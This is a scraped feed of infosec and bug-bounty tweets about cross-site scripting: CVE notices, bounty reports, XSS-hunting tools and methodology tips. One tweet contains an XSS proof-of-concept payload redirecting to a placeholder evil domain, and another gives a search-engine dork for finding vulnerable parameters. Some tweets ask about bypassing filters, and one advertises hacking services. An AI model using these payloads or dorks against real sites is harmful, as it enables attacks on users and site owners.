![profile](https://pbs.twimg.com/profile_images/1531334436800831488/evf2wJ4z_normal.jpg)
Filipi Pires
@FilipiPiresa year agophpMyAdmin Releases Software Update to Fix XSS Vulnerability https://t.co/L0H5kLbovZ #security #opensource #cybersecurity #malware #cyber #pentesting #malwareanalysis #infosec #redteam #malwarehunting #hacking #infosec #threathunting #bugbounty #tools #offensivesecurity
![profile](https://pbs.twimg.com/profile_images/419147954344058880/bTW9Gx7T_normal.png)
Gray Hats
@the_yellow_falla year agophpMyAdmin Releases Software Update to Fix XSS Vulnerability https://t.co/Jv59FsBMyc #opensource #infosec #security #pentesting
![profile](https://pbs.twimg.com/profile_images/1594050291770724353/hHWgJ3Th_normal.jpg)
Bug Zero
@BugZero_ioa year ago#BugZeroLightReading this week Tidbits of Cross-Site Scripting (XSS) Read: https://t.co/xrEUPwnloY #BugZero #BugBounty #SriLanka #BugZeroLightReading #BugBountyTips
![profile](https://pbs.twimg.com/profile_images/627732999161823232/QF5met-h_normal.jpg)
Hackers Online Club (HOC)
@HOCupdatea year agoHOCXSS — Automatic Cross-Site Scripting (#XSS) Vulnerability Scanner https://t.co/57RVqCEWTs Features : ● Automatic Parameters Detection ● Scan using TOR ● WAF Detection ● Multi-threaded Crawling ● Cookie Support #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1611794289373093888/fKx622P4_normal.jpg)
Cybernoz
@Cybernozcoma year agoDOM XSS vulnerability in Gartner Peer Insights widget patched https://t.co/w5RyGx9Jr1 #cybersecurity #cybersecuritynews #cybernews #infosec #informationsecurity
![profile](https://pbs.twimg.com/profile_images/792947851097575424/SyxYMTdQ_normal.jpg)
Hacker Spy Network
@HackerSpyNet1a year agoSignificance to “Not Set CSP” While Checking For XSS Vulnerabilities With XSpear? https://t.co/En6Gox8YW1
![profile](https://pbs.twimg.com/profile_images/1601131284083916801/j58cDDtG_normal.jpg)
ArcherL (@[email protected])
@realArcherLa year agoWould you be interested in receiving customized newsletters from https://t.co/a9616mChCH? Like, get articles based only on #xss #csrf #web #idors? I am experimenting with ways I can make it sustainable; as of now, it runs on what I earn from my part time job. #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1617228299360694272/zaJtlBK2_normal.jpg)
Luthra
@justluthraa year agoI injected BXSS Payloads in 2020 but got XSS Fired Today #bugbounty #xsshunter https://t.co/Y67RsfNSW6
![profile](https://pbs.twimg.com/profile_images/1619708775895629825/idqs3H8y_normal.jpg)
HackersFeed_io
@HackersFeed_ioa year ago🍟 DOM XSS vulnerability in Gartner Peer Insights widget patched LINK: https://t.co/tUwmvcUHQT Thanks The Daily Swig #infosec #networksecurity #redteam What do you think about it?
![profile](https://pbs.twimg.com/profile_images/1156965048562024448/Mmi-kx7e_normal.jpg)
SekureNet
@Sekureneta year agoDOM XSS vulnerability in Gartner Peer Insights widget patched #cybersecurity #infosec https://t.co/W1K01FZK4q
![profile](https://pbs.twimg.com/profile_images/1543995467927027712/HZ1bs4IU_normal.jpg)
Begin n Bounty
@beginnbountya year ago🔥XSS hunters, don't overlook the power of URL context! Many vulnerabilities can be found by testing payloads in URL parameters, so make sure to check this area thoroughly: #infosec #AppSec payload list: 👇
![profile](https://pbs.twimg.com/profile_images/1613798309860196353/CBgJ9iKO_normal.jpg)
s3c
@s3c_krda year agoBounty of stored XSS by collaboration with @siratsami71 @moe1n1 @zhenwarx #BugBounty #togetherwehitharder https://t.co/7o7JBfZUwK
![profile](https://pbs.twimg.com/profile_images/1364087716934078466/zRX1e_Bj_normal.jpg)
🇮🇳 ! Bõt âmît
@Botami143a year ago### WAF / Cloudflare Bypass 20+ XSS Payloads #bugbountytips #BugBounty #bugbountytip #cybersecuritytips #cybersecurity #hacker #Hacking #infosecurity #infosec #xss https://t.co/wcsXYDATVX
![profile](https://pbs.twimg.com/profile_images/1546114295070482433/zr0FuLXf_normal.jpg)
Pratik Dabhi
@impratikdabhia year ago$350 XSS in 15 minutes by @therceman https://t.co/Hq05YoSkR4 #bugbounty #infosec #Hacking
![profile](https://pbs.twimg.com/profile_images/1601087793916248064/UBQ_bD2k_normal.jpg)
at0m
@atomiczseca year ago#BugBounty #bugbountytips #bugbountytip #xss #payload #payloads #bughunting #bugs #javascript
![profile](https://pbs.twimg.com/profile_images/1600277408711680004/hFehNrzp_normal.jpg)
chosen negreaux americana
@TheDgtalEmpressa year agoWhat’s your fave security vulnerability to exploit red team? ❤️🔥 #CyberSecurity #infosec #redteam #hacking #sqlinjection #xss https://t.co/oNkyKw2Z7S
![profile](https://pbs.twimg.com/profile_images/1622340160112173056/myrVvUUF_normal.jpg)
0xSe.eK
@0se0ek a year ago #100dayofbugbounty day01 (xss): 1) Read this blog: https://t.co/1FE3D4aWtk 2) hunting 3 hours and find 1 bug but it's a duplicate 3) learn JavaScript language ------------ #bugbountytips #BugBounty #infosec #100DaysOfCode #100DaysOfCyberSecurity
![profile](https://pbs.twimg.com/profile_images/1621550242863742982/zQgY3-n5_normal.jpg)
hackwith_Roman🖥🛰📡
@RomanhacExpert1a year agoHack Services available 24/7 Link: https://t.co/3da2FxeJXV… #Metasploit #HackerOne #Synack #BugCrowd #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #XSS https://t.co/e4NfirdpfA
![profile](https://pbs.twimg.com/profile_images/1513609963431727107/fwWmlcsO_normal.jpg)
bounter
@_bughuntera year agoBlind XSS To SSRF 🔥🔥🔥🔥 https://t.co/mKiPbSHZQm #bugbountytips #bugbountytip #bugbounty
![profile](https://pbs.twimg.com/profile_images/1601664448925556736/xFqeWsSg_normal.jpg)
Mike Takahashi
@TakSeca year ago💣 XSS Hunter goes down Feb 11th! 🏆 Thank you @IAmMandatory for running it all these years! 👉 Build your own XSS Hunter w/ this easy script by @AdamJSturge: https://t.co/L9eq2fZiJL #xss #bugbountytips #bugbounty #hacking #infosec 👇🧵for more resources https://t.co/cpKMbtMHh2
![profile](https://pbs.twimg.com/profile_images/1332767878853091329/iqHqFeJ4_normal.png)
pandaquests (cute/cutie)
@pandaquestsa year agohttps://t.co/I9QUS39ZIX #xss #htmlinjection #javascript #cleancode #programming #programmer #coding #programmierung #hacking #web #code #codereview #computerscience #js #webdeveloper #webdevelopment #codingforbeginners #frontend #codenuggets #fyp #fy #pandaquests
![profile](https://pbs.twimg.com/profile_images/1601087793916248064/UBQ_bD2k_normal.jpg)
at0m
@atomiczseca year agoin the next couple days, I will be posting about my #XSS methodology and where I find most of them and how I found some. Stay tuned #bugbounty #bugbountytip #bugbountytips @trufflesec @XssHunter 🫡 https://t.co/w7viJQHzh0
![profile](https://pbs.twimg.com/profile_images/1369764815003136007/DX3xE5wp_normal.jpg)
khalil shreateh 🧢
@Shreateha year agohttps://t.co/fgwpcDRXBC #shreateh #exploit #hacker #computer #cybersecurity #blackleaders #technology #vulnerability #vulnerabilityisstrength #vulnerable #infosec #security #tech #hacking #programming #hackers #coding #safety #cybersec
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoGreat news. new version of xss hunter. Link: https://t.co/at87pRp8MR #bugbountytips #xsshunter #xss #hacker #bugbounty https://t.co/U0CzmpwaYI
![profile](https://pbs.twimg.com/profile_images/1621829734358286336/_B4xi_5F_normal.jpg)
HeNews
@HeNews9a year agoThe course also covers web application hacking, discovering and exploiting vulnerabilities, and protecting against XSS and MITM attacks. Finally, the course covers social engineering techniques and malware analysis.
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Securitya year agoPopular keywords used with #vulnerability tweets Date: 2023-02-04 Unique Tweets: 210 TOP 10 KEYWORDS 1: Cross 2: Site 3: XSS 4: Scripting 5: GoAnywhere 6: MFT 7: CSRF 8: Fortra's 9: Injection 10: Vigil bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/659444735791210500/XGvv9R-0_normal.jpg)
Ptrace Security GmbH
@ptracesecuritya year agoWinning QR with DOM-Based XSS | Bug Bounty POC https://t.co/Lx1t1Ab4B1 #Pentesting #BugBounty #CyberSecurity #Infosec https://t.co/cpYAIRawQz
![profile](https://pbs.twimg.com/profile_images/1620175770260803584/LEhWGVwZ_normal.jpg)
Borna Nematzadeh
@LogicalHuntera year agoThe @trick3st is a better way to automate your recon workflow! Here's a simple workflow to find XSS vulnerability. It imports URLs from the input and uses both dalfox and nuclei-xss-templates (-tags xss) for scanning. #bugbounty #bugbountytips https://t.co/rfXZD9RpYK
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSec a year ago Path-based XSS with different types of methods⚔️ 1: Inject payload in every path and check XSS 2: append fake parameters in every path and check XSS vulnerability 3: made PoC for you in your terminal https://t.co/82zFTiWWmg #infosec #bugbountytips #CyberSecurity https://t.co/BHuPzXuEiv
![profile](https://pbs.twimg.com/profile_images/1404125874350264322/6G0a9c7a_normal.jpg)
payloadartist
@payloadartista year ago⚙️ XSSHunter service is deprecated. Now what? 👇(1/2) @trufflesec launched a better version of it with more checks - CORS - Secrets on the page the payload fires - Exposed .git directory https://t.co/VPFRxraj6L #bugbounty #infosec #cybersecurity #redteam #bugbountytips https://t.co/NcTP4WGUKa
![profile](https://pbs.twimg.com/profile_images/1190552636782718976/yI0sJiOH_normal.jpg)
Rami (drunkrhin0)
@drunkrhin0a year agoYou're sleeping on this if you haven't read it yet 😴 ✅ DOM XSS ✅9+ entities affected ✅Detailed explanation (with diagrams too!) ✅PoC ✅ Absolute legend @justinsteven #bugbountytips https://t.co/Z41wr7GL6u
![profile](https://pbs.twimg.com/profile_images/1573743263689089024/W_n7aUJB_normal.jpg)
Ashish Dhone
@ashketchum_16a year agoHacked @Apple Teacher Learning Centre - ATLC 4th time ❤️ Bug: Bypass Blind XSS Bounty: $7500 Soon I'll be posting case study on my channels at, https://t.co/g1LMOhSQUH https://t.co/rRiWLQ7owA ./KEEP_hacking #apple #keep_hacking #news #media #BugBounty #hacker #HackerNews https://t.co/UqTRcrEmcT
![profile](https://pbs.twimg.com/profile_images/1434211180965347329/zxgxkrpz_normal.jpg)
r3kt
@iamR3KTa year ago@krishnsec and I collaborated on one program at @Bugcrowd through this I earned more than my one month salary in just 4 nights. Reported 10 Ref XSS 2 SSRFs etc Really learned new things from him new target - Hustle to earn my first 4 digit bounty. Improving in #BugBounty
![profile](https://pbs.twimg.com/profile_images/1606293148660944897/BxifR7s3_normal.jpg)
Manoj Khadka🇳🇵
@Manojkhda year agoWhen try some web put xss🐞payload then Boom!💥 with PoC ex payload: <script>window.location=”http://evil[.]com”;</script> #xss #bugbountytips https://t.co/vGDrJt3pQ0
![profile](https://pbs.twimg.com/profile_images/772040373778644997/qxorQMr4_normal.jpg)
Rey
@Rey_Nevana year ago@Infosec_Taylor There is a big difference between a pentest and looking for issues on a website. So it really depends if we speak missing encryption, xss, or sql injection. Just like in the strip club, looky looky but no touchy touchy
![profile](https://pbs.twimg.com/profile_images/1301206555338051584/nUAnAMr9_normal.jpg)
Hacking Articles
@hackinarticlesa year agoComprehensive Guide on Cross-Site Scripting (XSS) https://t.co/bF8HmpQ7pc #infosec #cybersecurity #cybersecuritytips #pentesting #oscp #redteam #informationsecurity #cissp #CyberSec #networking #networksecurity #CheatSheet #infosecurity #cyberattacks #bugbounty #bugbountytips https://t.co/draWLOf1Oj
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoDOM-Based XSS for fun and profit $$$! | Bug Bounty POC https://t.co/OK9tBqCb1N #infosec #cyberattack #cybersecurity #bugbounty #bugbountytip #hacking
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0608): Cross-site Scripting (XSS) - DOM in microweber/microweber. https://t.co/zF4lKUoOTq Disclosed by https://t.co/bYpI4eoNDU, fixed by microweber maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0607): Cross-site Scripting (XSS) - Stored in projectsend/projectsend. https://t.co/aK4e96vmtK Disclosed by @@d47sec, fixed by projectsend maintainers... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1601815160380788738/AMiNgyjg_normal.jpg)
Abhishek Meena
@Aacle_a year ago✨Bug Bounty Pro Tip: ➡Escalate everything you find! #bugbounty #Infosec #hacking • Don’t report SSRF, Escalate to RCE. • Don’t report Self-XSS, Chain it with Clickjacking. • Don’t report Self-Stored XSS, Chain it with CSRF. More🧵(1/n) : 👇 https://t.co/4NHJzEtXU5
![profile](https://pbs.twimg.com/profile_images/1232543850461368320/0HD_1RjH_normal.jpg)
Dr.FarFar
@3XS0a year ago#FREE 2ಠ23 ♥ Acunetix Premium 15.3.230123162 Full Activated – Discount 100% OFF https://t.co/Joixus9aMb Link : https://t.co/kvz50QYeZl #Acunetix #HackerOne #Hackers #Synack #BugCrowd #XSS #BugBounty #BugBountyTips #InfoSec #CyberSecurity #100DaysOfCode #Malware #HackerNews https://t.co/8SGqMWgvCD
![profile](https://pbs.twimg.com/profile_images/1595902455677583360/7FXgxSwh_normal.jpg)
Cybersecurity Tooling Bot
@infosec_intela year agoGithub: https://t.co/DKV5D94Bg6 Stars: 9 Watching: 0 Last change: Aug 8, 2021 #infosec #redteam #pentesting #hacking #cybersecurity #bugbounty
![profile](https://pbs.twimg.com/profile_images/1595902455677583360/7FXgxSwh_normal.jpg)
Cybersecurity Tooling Bot
@infosec_intela year agoGithub: https://t.co/0XV9h5Bcwq Stars: 869 Watching: 28 Last change: Oct 31, 2022 #infosec #redteam #pentesting #hacking #cybersecurity #bugbounty
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0606): Cross-site Scripting (XSS) - Reflected in ampache/ampache. https://t.co/nhgZcnUkD7 Disclosed by https://t.co/dmte2VSaRV, fixed by @ampache... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1593618264512503809/2aZnRgly_normal.jpg)
0ha€ck^
@mrzip2zip a year ago The best extension in browser to find XSS, SQL, encode, decode payload and more https://t.co/NfBsFo4gpJ ——— #bugbountytips #BugBounty #infosec #cybersecurite #Pentesting #Hacked #bugcrowd https://t.co/urDpY0MScX
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoXSS, Flash Cross-Domain Policy, and CSRF Vulnerabilities Discovered on a Single Website https://t.co/SGHtOv29OW #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoXSS vulnerability https://t.co/HWvYrmE81i #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1606293148660944897/BxifR7s3_normal.jpg)
Manoj Khadka🇳🇵
@Manojkhda year agoDo you like 🐞deface using XSS, and I love hunting with parameter PoC #xsshunter #bugbountytips #xss https://t.co/P3d81h5JDH
![profile](https://pbs.twimg.com/profile_images/1505819877835214850/9FnQbuQN_normal.jpg)
beam
@beamsterzeroa year ago@CanYouHearBR Currently hacking your web server and doing a XSS script
![profile](https://pbs.twimg.com/profile_images/1622340160112173056/myrVvUUF_normal.jpg)
0xSe.eK
@0se0ek a year ago How to find XSS (XSS methodology): https://t.co/0DOcR2Bmid ----------------------- #BugBounty #BugBountyTip #bugbountytips #infosecurity #infosec #Hacking https://t.co/0sdytCoRu7
![profile](https://pbs.twimg.com/profile_images/1611746652670365696/RStyd501_normal.jpg)
Lewis
@0reoSeca year ago@inj3ct0r: #0day #Hikvision Remote Code Execution / #XSS / #SQLi #Injection #Vulnerabilities #RCE https://t.co/7E5t6LsnsV #cybersecurity #infosec @0reoSec
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoVue JS Reflected XSS https://t.co/aZbs8ZheFL #infosec #Bugbounty #bugbountytips #cybersecurity #hacking #cyberattacks
![profile](https://pbs.twimg.com/profile_images/1610955901116243970/HcShkB78_normal.jpg)
HACKLIDO | Cybersecurity
@hacklidoa year ago📩 Cyber Security Round Up #4: 150,00 EUR worth XSS, Binary Exploitation, Hacking ATMs, JavaScript Hacking, API Security, NoSQL, SSRF, IDORs & more… 🔗 https://t.co/CYMBoX4g8F --- # Tags --- #infosec #infosecurity #cybersecurity #bugbountytip #bugbountytips #ChatGPT
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoDon’t Give Up On XSS! | Fun Firefox XSS #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1616562586467684396/G-YSRH46_normal.jpg)
XSS Report
@XssReporta year ago20.000 XSS reports left behind! Over 2000 bounty hunters chose https://t.co/uVCBeExkBl. Congratulations on your bounties! #xss #bugbounty #xssreport
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoHow I found XSS on Admin Page without login! https://t.co/e153dJ6uxO #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoReflected XSS Leads to 3,000$ Bug Bounty Rewards from Microsoft Forms https://t.co/DpiQUWueZT #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ Stored XSS in Public Profile Reviews 👨💻 vj1naruto ➟ https://t.co/Jg5UIutlvx ⬜ None 💰 $250.0 https://t.co/T1ZYyhwHGl #bugbounty #bugbountytips #cybersecurity https://t.co/73W2mrk8Nr
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ Stored XSS in SVG file as data: url 👨💻 @irisrumtub ➟ Shopify 🟧 Medium 💰 $5300.0 https://t.co/C7HleUXN95 #bugbounty #bugbountytips #cybersecurity https://t.co/nM1XxnCGW1
![profile](https://pbs.twimg.com/profile_images/1611746652670365696/RStyd501_normal.jpg)
Lewis
@0reoSeca year ago@packet_storm: Hikvision Remote Code Execution / XSS / SQL Injection https://t.co/DiJp59WPRN #advisory #cybersecurity #infosec @0reoSec
![profile](https://pbs.twimg.com/profile_images/1597806192239190016/NqSjX4sT_normal.jpg)
Matt Suiche
@msuichea year ago@joernchen XSS ruined infosec
![profile](https://pbs.twimg.com/profile_images/1113485744771698688/gbDDFbV1_normal.jpg)
Brier & Thorn México
@BrierandThornMX a year ago Learn more about Cross Site Scripting (#XSS), check out our blog on the topic. https://t.co/10iII0CgzV #infosec #XSS #ciberseguridad
![profile](https://pbs.twimg.com/profile_images/1611727860032487424/EDNqWQpi_normal.jpg)
int
@0x1inta year agoSuch a nice scam in #BugBounty field 😂☠️ this isn't an XSS issue. https://t.co/dD12Kv4Ffw
![profile](https://pbs.twimg.com/profile_images/1601664448925556736/xFqeWsSg_normal.jpg)
Mike Takahashi
@TakSeca year agoXSS in multi-step flows: 1. Something stored/reflected, but not w/ Repeater 2. Turn "Intercept" On 3. Submit the form on the page 4. Forward requests until you get to the reflected request 5. Inject your XSS payload 💥 #xss #bugbountytips #bugbounty #infosec #hackingtools https://t.co/MFSrEvV45M
![profile](https://pbs.twimg.com/profile_images/1610626347709112321/XFrREd5N_normal.jpg)
Goziem
@g0ziema year ago@ADITYASHENDE17 @R29k_ @akita_zen @Jhaddix @zseano @hacker_ @0x0SojalSec @abdlah_md I found an endpoint, which is &code= I think it is vulnerable to xss but it blocks (, ), <script>, ` How do I bypass cloudflare waf? #xss #BugBounty
![profile](https://pbs.twimg.com/profile_images/1619756027808718851/6bQmRyck_normal.jpg)
eagle rage
@eaglerage0a year ago20 YOUTUBE CHANNELS TO LEARN HACKING PhD security HackerSploit InsiderPhD Null byte STÖK ZSecurity Hak5 IppSec The XSS Rat Nahamsec SecurityFWD Vickie Li Dev NetworkChuck The Cyber Mentor John Hammond Rana Khalil ITProTV PwnFunction edureka! David bombal #CyberSec #BugBounty
![profile](https://pbs.twimg.com/profile_images/1520376990389440513/Y8zY5deu_normal.jpg)
Demon
@R29k_a year ago1- Found a support page. 2- It had Name,email and message fields 3- There was an option for saving your info, selecting it will save your Name and Email on the support page. 4- There was a self-xss in Name Field. 5- Chained it with CSRF and got a nice Stored XSS #BugBounty #xss
![profile](https://pbs.twimg.com/profile_images/1608133299880198155/yULlocZw_normal.jpg)
Beg Hunter
@BegHuntera year agoFull disclosing XSS ATO 0day method #0dayHunting #TogetherWeStrikeHarder #bugbountytips https://t.co/C0N7HkzmIy
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0ya year agoIf you are looking to move away from #xsshunter @XssHunter you can give a try to a new product @bxsshunter (https://t.co/VRQCgNtZht) give us a try and let us know what more features you need! #xss #xsshunter #BugBounty #bugbountytips #blindxss https://t.co/RuYeT5Mgo7
![profile](https://pbs.twimg.com/profile_images/1475684641621397511/cfuVbh5A_normal.jpg)
Glênnio
@iGlennio a year ago XSS flaw on Globo's site at @valoreconomico allows redirecting, infecting, or stealing the session cookies of other users. #BugBounty #bugbountytips #Hacked #Hacking #Pentesting #cybersecuritytips #globo #GloboNews #Twitter #virus #hacker #ITSecurity #Defcon #SEC https://t.co/2I97I6aSDw
![profile](https://pbs.twimg.com/profile_images/1617726926646554624/BmmPqvup_normal.jpg)
BXSS Hunter
@bxsshuntera year ago@bxsshunter (https://t.co/vwMj0MYp29) now supports all the same features now + more of them ! go ahead and give us a try! #bxsshunter #bugbounty #bugbountytips #blindxss #bugbountytip #infosec #cybersecuritytips #cybersecurity #xss #xsstips https://t.co/MmgZXZCiLD
![profile](https://pbs.twimg.com/profile_images/1276860019418394625/Zny8G7Kl_normal.png)
Cyber Xplore
@CyberXplorea year agoExciting news! BXSS Hunter (https://t.co/PT2HFpr02C) has been updated with improved CORS detection, secret DOM detection, .git directory detection, & bug fixes! #xsshunter #bxsshunter #bugbountytips #bugbountytips #CyberSecurity #cybersecuritytips #bugbounty @bxsshunter
![profile](https://pbs.twimg.com/profile_images/1617726926646554624/BmmPqvup_normal.jpg)
BXSS Hunter
@bxsshuntera year agoExciting news! BXSS Hunter (https://t.co/vwMj0MYp29) has been updated with improved CORS detection, secret DOM detection, .git directory detection, & bug fixes! #xsshunter #xss #bxsshunter #bugbountytips #bugbountytips #CyberSecurity #cybersecuritytips #bugbounty #bxss
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0ya year ago@bxsshunter has been updated to Version 1.0.1 checkout changelog at https://t.co/DQOP2RKxso & check out new features such as 1- cors detection 2- secrets detection in dom 3- detection of .git directories #bxsshunter #xsshunter #xss #bugbountytips #bugbounty #CyberSecurity https://t.co/dkpJfKFGhl
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0ya year ago@CyberXplore is proud to announce that https://t.co/VRQCgNtZht has been updated with new features such as : 1- detection of cors issues 2- detection of secrets in dom 3- detection .git directories 4- bug fixes #xsshunter #xss #bxsshunter #bugbountytips #bugbounty @bxsshunter
![profile](https://pbs.twimg.com/profile_images/1403322076400861186/01U-3sJI_normal.jpg)
Mohamed Ibrahim
@mOhamedd7wa year agoGot XSS on #bugcrowd #bugbounty #bugbountytips https://t.co/ZtJ2AWwIGJ
![profile](https://pbs.twimg.com/profile_images/1239087154166411264/PsQN_-id_normal.jpg)
socket
@yxw21a year agoNew XSS platform released. Support using your own domain name. Support webhook. Mates with the burpsuite extension to log the full request that triggers xss. For more, please visit. https://t.co/WtUhwVFo0j #xsshunter #xss #hackerone #bugbounty #bugcrowd #bugbountytip #burpsuite https://t.co/osa82hf4qv
![profile](https://pbs.twimg.com/profile_images/1557290969766457344/xoSk7tPH_normal.jpg)
Pentester Academy
@SecurityTubea year agoEver wanted to know how XSS attacks work? Try it hands-on, for free! In this lab exercise, you will pentest a vulnerable web application with the XSSer tool. Sign in at https://t.co/vfBZUZ9khb and get started at https://t.co/9eVbY19yLq #XSS #pentest #infosec https://t.co/kNUNKFdf8C
![profile](https://pbs.twimg.com/profile_images/1470032456107675650/Y4fqzVn8_normal.jpg)
Excommunicado
@wy4210a year agoMy xsshunter triggered but it shows Cloudflare IP and the other one is not visible from where it belongs. Anyone can help me with that. @0x0SojalSec @hetmehtaa @TakSec #bxss #bugbountytip
![profile](https://pbs.twimg.com/profile_images/1167664300477026305/P16NJIIM_normal.jpg)
Chagara
@emchagaraa year agoYesterday I ran a small poll to understand what InfoSec pros consider as easy kills for beginners in cybersecurity, here is your result. So incase you want to build your confidence in hacking, start with injection attacks. Eg; XSS, SQL injection, Command Injection etc. https://t.co/W9HRPQN2LQ
![profile](https://pbs.twimg.com/profile_images/1614324150985801728/M_8Lurt5_normal.jpg)
onhexgroup
@onhexgroup a year ago The @trufflesec team has announced that, after talking with the creator of #XSSHunter, they have released a new version of this tool with more features. #xss #bugbounty #باگ_بانتی https://t.co/1IGPpageUJ
![profile](https://pbs.twimg.com/profile_images/1573240538039746560/buTP5mKO_normal.jpg)
Muhammed Farish
@muhamedfarisha year agohttps://t.co/PFBHVOZRlJ #cybersecurity #bug #bugbounty #security #computerscience #networks #hacking #hacker #programming #ethicalhacking #pentesting #kalilinux #parrotos #coding #Fetlla #Medium #infosec
![profile](https://pbs.twimg.com/profile_images/1620234621664301058/JRaroJPn_normal.jpg)
Nitro Soul
@Mohamed22564239a year agoXSS by exciting script with open redirect lead to run scripts to CROSS SITE SCRIPTING https://t.co/ZY2lQoN6WP #bugbunty #bugbountytips #openredirect
![profile](https://pbs.twimg.com/profile_images/1617982870169219072/lIX7QG3n_normal.jpg)
Security Talent
@devmehedi101a year agoAlhamdulillah, I completed another big project of #penetration_testing / #ethical_hacking. Can get a #reverse_shell through DOM Based #XSS. The client was happy with me and awarded me an extra amount and gave a nice review. https://t.co/gHpYBFQcke #bugbountytip #bugbountytips https://t.co/kGI0jtK0DU
![profile](https://pbs.twimg.com/profile_images/1548889702572429314/9fWrKfah_normal.jpg)
Kali Nathalie 🏳️⚧️
@K4L1_FS a year ago [Infosec] It's not all roses; I, for example, have never found an XSS in the real world 😭 (Seriously....🥲) https://t.co/zoNsAB067d
![profile](https://pbs.twimg.com/profile_images/1620183131297927170/_upI4SO3_normal.jpg)
Mohamed Yasser
@Mohamed22564239 a year ago When you go in to review what you know in a certain lab and discover a reflected XSS vulnerability 😂😂 in the middle of the lab #XSS #bugbountytips #webgoat #BugBuntyHunting https://t.co/pKoVqoqYlL
![profile](https://pbs.twimg.com/profile_images/1601664448925556736/xFqeWsSg_normal.jpg)
Mike Takahashi
@TakSeca year ago🔎 Google Dork - XSS 🔍 inurl:q= | inurl:?s= | inurl:search= | inurl:query= | inurl:lang= | inurl:keyword= inurl:& site:example[.]com Find common parameters vulnerable to XSS #recon #bugbountytips #infosec #seo https://t.co/Wg7AI7gu9A
![profile](https://pbs.twimg.com/profile_images/1430451138277556224/yDiqSjga_normal.jpg)
HackGit
@hack_gita year agoXssor.go Xssor is XSS payloads reflections in source code checker. https://t.co/zIHBg4Z5qi #pentesting #bugbounty https://t.co/Iu7DPmaXVn https://t.co/2XgSSzFiq7
![profile](https://pbs.twimg.com/profile_images/1618280109223432192/pGLrEUXP_normal.jpg)
E.T
@EugenTezlawa year ago@R29k_ @NeolexSecurity @Bugcrowd Omg with simple xss and sql bugs it's really possible to earn so much money? I should return back to hacking....
![profile](https://pbs.twimg.com/profile_images/1492454333119545345/YA8wGCEf_normal.jpg)
Suyash Sharma
@SuyashS91823422 a year ago Reported many #bugs in many organisations this month. Bug type:- 4 XSS (medium) 2 misconfigured Jenkins instances (HIGH) #bugbountytips #UPDATE #infosec #CyberSec https://t.co/MpfBsCldYF
![profile](https://pbs.twimg.com/profile_images/1617973646114566144/ddWh9SBV_normal.jpg)
Eyuga
@Eyug_aa year agoHii guys want to learn about #xss do you guys have any tutorials for me to watch or read to learn xss. #Linux @LiveOverflow @TCMSecurity #ethicalhacking #Pentesting #bugbounty
![profile](https://pbs.twimg.com/profile_images/1619646761819324416/QRUF4zOx_normal.jpg)
Prince Prafull
@PrincePrafull3a year agoSuggest some xss payloads to bypass >, <, (, ), alert, script etc. filters #xss #payloads #bugbountytips #BugBounty #webappsecurity
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
